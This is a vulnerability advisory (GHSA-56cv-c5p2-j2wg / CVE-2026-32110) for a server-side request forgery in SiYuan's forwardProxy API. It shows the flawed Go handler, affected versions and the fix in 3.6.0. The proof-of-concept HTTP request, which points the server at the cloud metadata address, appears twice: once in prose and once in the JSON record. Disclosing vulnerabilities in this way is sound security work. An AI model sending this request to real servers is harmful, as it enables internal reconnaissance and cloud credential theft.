GHSA-56CV-C5P2-J2WG

Vulnerability from github – Published: 2026-03-12 14:23 – Updated: 2026-03-12 14:23
VLAI?
Summary
SiYuan has a Full-Read SSRF via /api/network/forwardProxy
Details

Summary

The /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services.

Affected Code

File: /kernel/api/network.go (Lines 153-317)

func forwardProxy(c *gin.Context) {
    ret := gulu.Ret.NewResult()
    defer c.JSON(http.StatusOK, ret)

    arg, ok := util.JsonArg(c, ret)
    if !ok {
        return
    }

    destURL := arg["url"].(string)
    // VULNERABILITY: Only validates URL format, not destination
    if _, e := url.ParseRequestURI(destURL); nil != e {
        ret.Code = -1
        ret.Msg = "invalid [url]"
        return
    }

    // ... HTTP request is made to user-controlled URL ...
    resp, err := request.Send(method, destURL)

    // Full response body is returned to the user
    bodyData, err := io.ReadAll(resp.Body)
    // ...
    ret.Data = data  // Contains full response body
}

PoC

  • First, authenticate with your access auth code and copy the authenticated cookie.
  • Now use the request below for SSRF to Access Cloud Metadata.
POST /api/network/forwardProxy HTTP/1.1
Host: <HOST>
Cookie: siyuan=<COOKIE>
Content-Length: 102

{"url":"http://169.254.169.254/metadata/v1/","method":"GET","headers":[],"payload":"","timeout":7000}'

Screenshot 2026-03-11 at 1 23 36 AM

Impact

  • Internal Network Reconnaissance: Attackers can scan internal services
  • Cloud Credential Theft: Potential access to cloud metadata and IAM credentials
  • Data Exfiltration: Server can be used as a proxy to access internal resources
  • Firewall Bypass: Requests originate from trusted internal IP
Severity ?
8.3 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.5.9"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32110"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-12T14:23:14Z",
    "nvd_published_at": "2026-03-11T21:16:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `/api/network/forwardProxy` endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services.\n\n### Affected Code\nFile: `/kernel/api/network.go` (Lines `153-317`)\n```\nfunc forwardProxy(c *gin.Context) {\n    ret := gulu.Ret.NewResult()\n    defer c.JSON(http.StatusOK, ret)\n\n    arg, ok := util.JsonArg(c, ret)\n    if !ok {\n        return\n    }\n\n    destURL := arg[\"url\"].(string)\n    // VULNERABILITY: Only validates URL format, not destination\n    if _, e := url.ParseRequestURI(destURL); nil != e {\n        ret.Code = -1\n        ret.Msg = \"invalid [url]\"\n        return\n    }\n\n    // ... HTTP request is made to user-controlled URL ...\n    resp, err := request.Send(method, destURL)\n    \n    // Full response body is returned to the user\n    bodyData, err := io.ReadAll(resp.Body)\n    // ...\n    ret.Data = data  // Contains full response body\n}\n```\n### PoC\n- First, authenticate with your access auth code and copy the authenticated cookie.\n- Now use the request below for SSRF to Access Cloud Metadata.\n```\nPOST /api/network/forwardProxy HTTP/1.1\nHost: \u003cHOST\u003e\nCookie: siyuan=\u003cCOOKIE\u003e\nContent-Length: 102\n\n{\"url\":\"http://169.254.169.254/metadata/v1/\",\"method\":\"GET\",\"headers\":[],\"payload\":\"\",\"timeout\":7000}\u0027\n```\n\u003cimg width=\"1230\" height=\"754\" alt=\"Screenshot 2026-03-11 at 1 23 36\u202fAM\" src=\"https://github.com/user-attachments/assets/60486dba-1ccd-4287-8073-b803854756a2\" /\u003e\n\n### Impact\n- Internal Network Reconnaissance: Attackers can scan internal services\n- Cloud Credential Theft: Potential access to cloud metadata and IAM credentials\n- Data Exfiltration: Server can be used as a proxy to access internal resources\n- Firewall Bypass: Requests originate from trusted internal IP",
  "id": "GHSA-56cv-c5p2-j2wg",
  "modified": "2026-03-12T14:23:14Z",
  "published": "2026-03-12T14:23:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32110"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan has a Full-Read SSRF via /api/network/forwardProxy"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.